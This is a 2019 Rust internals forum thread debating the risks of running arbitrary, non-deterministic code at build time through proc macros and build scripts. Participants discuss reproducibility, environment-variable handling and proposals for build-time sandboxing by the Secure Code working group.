Is executing arbitrary code at build time a good idea?

jsgf · January 17, 2019, 9:16pm

FWIW, running arbitrary non-deterministic code at build time is very undesirable. I’d love it if there were a way to guarantee that proc-macros are always deterministic (or at least have a way to absolutely forbid anything that’s non-deterministic, like poking at external database schema).

Without that, there would never be a way for the build system to determine whether a given target is up to date, nor would there be a guaranteed way to reproduce a given target binary.

Proc-macros are probably OK, given that they can be audited, and there’s at least some friction to writing a new one - can you can detect their presence by looking at the dependency graph. Allowing any arbitrary code to do non-deterministic computation at compile time is definitely not OK.

ckaran · January 17, 2019, 9:28pm

@jsgf I respectfully disagree with you on this. Pretend that you need to solve a particular NP-complete problem instance to really optimize some block of code. You've done something really smart and written a procedural macro that is able to use rayon to parallelize the work, but since you have to search an exponential space, you really can't tell how long it will take. This is best done once, at compile time, on some really powerful dev machine (maybe overnight). The alternative is finding each block of code that needs this optimization, extracting it by hand, running some custom code over that extraction, and then putting it back into the code base. You can extend this idea to run it on something like scoop, which makes the compilation time non-deterministic.

kornel · January 17, 2019, 11:35pm

It doesn’t matter if it’s a good idea. Proc macros are stable now and Rust guarantees they will be supported forever.

cuviper · January 17, 2019, 11:38pm

Shouldn’t you have the same concern about build scripts in general?

CAD97 · January 17, 2019, 11:43pm

There’s a fine clarification here. There’s two kinds of before-runtime calculation that tends to all be shoved into “compile time” (which does keep it up to date) but have different connotations. Also, what does deterministic actually get for us?

I see two distinct precomputation types. Compile time macros are the normal, and typically cheap, manipulation of localized information. Const computation falls into the same bucket.

The best example of the other category is ML models; this is precomputed information that doesn’t need to be regenerated and shouldn’t be every build. This also has much weaker determinism requirements and ability.

Unless you’re concerned about full bit-for-bit reproducibility (which is a good but hard thing), what determinism gives you is consistent behavior and the ability for the compiler to aggressively cache things. For this reason, even nondeterministic proc macros aren’t an issue, so long as their surface area is.

ExpHP · January 17, 2019, 11:55pm

I would think a nondeterministic proc macro is already forbidden (or rather, the compiler must make some assumptions about things proc macros do not do) because nondeterminism would destroy all hope of incremental compilation.

bascule · January 18, 2019, 1:01am

I agree with this, however the existing Rust build-time code execution system is what it is, so we need to work within those constraints. We could potentially add new build-time restrictions which pass crater, though.

Myself and several other members of the Secure Code WG have discussed this extensively and several of us feel adding some sort of build-time sandboxing is a high priority item.

As it were, I just (as in hours ago, my blog post is still an evergrowing WIP) blogged about this as part of the 2019 roadmap, giving my rationale for why a build-time sandbox is a good idea:

I do intend to further expand that section with additional details of what an actual sandbox might look like. On Linux, it would be nice to find a seccomp policy which heavily restricts "exotic" system calls, so to reduce the likelihood of build.rs scripts escalating to root through kernel bugs.

comex · January 18, 2019, 2:13am

I don’t think that eliminating all possible sources of nondeterminism is possible or desirable, but I do think we could do better at providing ways to detect and avoid inadvertent nondeterminism.

In particular, build scripts often use environment variables, and need to remember to manually print cargo:rerun-if-env-changed for all relevant ones. I’d like to see:

An option (or even a default) to clear the entire environment before running build scripts; the build script could then provide a whitelist of variables which would not be cleared, but which would trigger a rebuild if changed. Some variables, such as PATH, could be whitelisted by default. There would also have to be a way for the user to manually whitelist additional variables for various reasons. For instance, they might want to pass platform-specific environment variables to their C compiler when building a crate that uses cc-rs to compile C code: e.g. SDKROOT on macOS.
A tool to instrument getenv calls from build scripts and their subprocesses to identify environment variables they use. This would be especially useful without environment variable whitelisting, but still useful with it, because those variables could be added to the whitelist to save the user the inconvenience of manually whitelisting them. Instrumenting getenv requires platform-specific techniques and isn’t always possible (on Linux, it won’t work for statically-linked binaries), so such a tool would necessarily be “best-effort”, but it could work in the most common cases.

See also: https://github.com/rust-lang/cargo/issues/5282

ckaran · January 23, 2019, 3:16pm

I fully agree with the sandboxing idea, but how will you do it? Is there a model of what is permissible, and what isn’t? I’m thinking back to my distributed compilation idea; right now, I think it may be possible to write a proc macro that allows you to reach across the network at compile time to distribute chunks of code for further processing. The problem is that means you can have a trojan horse; Evil Hacker™ contributes code to some project that includes a proc macro, that, when compiled, immediately starts scanning the network of the machine it’s being compiled on, and then sends that information to Evil Hacker™. So now we need a networking model that limits what damage a bad macro can inflict.

On top of that, the sandboxes will likely need to be recursive; vec![evil!(), evil!(), evil!()]; shouldn’t leak into vec!() if at all possible (that is too contrived, you should be able to think of something better).

In short, it’s a headache, and I’m glad you guys are working on it, and not me!

bascule · January 23, 2019, 4:42pm

I started an issue about this on the Secure Code WG, and wrote down some initial thoughts:

github.com/rust-secure-code/wg

Build-time sandboxing

opened 04:21PM - 23 Jan 19 UTC

closed 04:31PM - 18 May 19 UTC

tarcieri

There's been a lot of discussion in the WG (and in the past, several pre-RFC sty…le proposals) to add some sort of sandboxing around code executed during the build process, including things like `build.rs` files and procedural macros. I wrote down my rationale for what I'd like to defend against with such a sandbox: https://tonyarcieri.com/rust-in-2019-security-maturity-stability#sandboxing-for-code-classprettyprintbuildrsco_2 tl;dr: build-time attacks are stealthier than trojans in build targets, and permit lateral movement between projects when attacking a build system. The devil is in the details, though. This issue is for discussing them. Some prior art / discussion: - [pre-RFC: Cargo Safety Rails](https://internals.rust-lang.org/t/pre-rfc-cargo-safety-rails/5535) - [RFC: Implement a sandbox for environment variables and files](https://internals.rust-lang.org/t/rfc-implement-a-sandbox-for-environment-variables-and-files/7213) - [Security fence for crates](https://internals.rust-lang.org/t/security-fence-for-crates/8005) - [Build script capabilities](https://internals.rust-lang.org/t/build-script-capabilities/8635)

I think there are several directions this could take, and documented some prior art around "a model of what is permissible, and what isn’t".

I think there's a "do no harm" sandbox path that can be immediately pursued for restricting build scripts from doing things like exotic system calls (which no existing build scripts are using, but are potential local privilege escalation targets in the kernel).

But there's also an "ambitious" sandbox, which could use things like gaol to lock down compile-time code execution. It'd have to start off-by-default and have users opt-in, but with enough work I think something like that could be on-by-default in the next edition. Perhaps these scripts could have optional build-time capabilities, like network access, which crate users must opt into.

Both approaches have merit, I think, and can be worked on in parallel independent of each other.

ckaran · January 23, 2019, 5:17pm

@bascule I just replied on your Github issue, but quick recap for everyone here…

I propose that we create the underhanded rust code contest similar to the Underhanded C contest. We don’t have to write full rust out for everything, but it would gather into one place all the evil that can be done from within the compiler at compile time, which will inform what the security posture/sandbox will need to be in the future.

Ixrec · January 23, 2019, 5:24pm

We sort of did create it already: http://blog.community.rs/underhanded/2017/09/27/underhanded-results.html But apparently we failed to make it a recurring thing?

jer · January 23, 2019, 6:08pm

Indeed, it was a one time thing (so far), due to the lack of people driving it forward. If people want to set up one again the Community Team would definitely be interested in promoting it.

bascule · January 24, 2019, 1:42am

Sounds like something the Secure Code WG could potentially carry forward

jer · January 24, 2019, 8:19am

Let’s talk!

skade · January 24, 2019, 11:26am

I created a tracking issue here: https://github.com/rust-community/team/issues/256

system · April 24, 2019, 11:26am

This topic was automatically closed 90 days after the last reply. New replies are no longer allowed.

Topic		Replies	Views
Deterministic isolated proc-macros	27	1856	September 5, 2024
Security breach with Rust macros compiler	31	3778	August 25, 2021
JIT style dynamic compiler language design	5	1391	February 5, 2021
Pre-RFC: Sandboxed, deterministic, reproducible, efficient Wasm compilation of proc macros language design	60	19866	April 5, 2024
Pre-RFC: procmacros implemented in wasm compiler	98	10069	January 21, 2020

Is executing arbitrary code at build time a good idea?

Related topics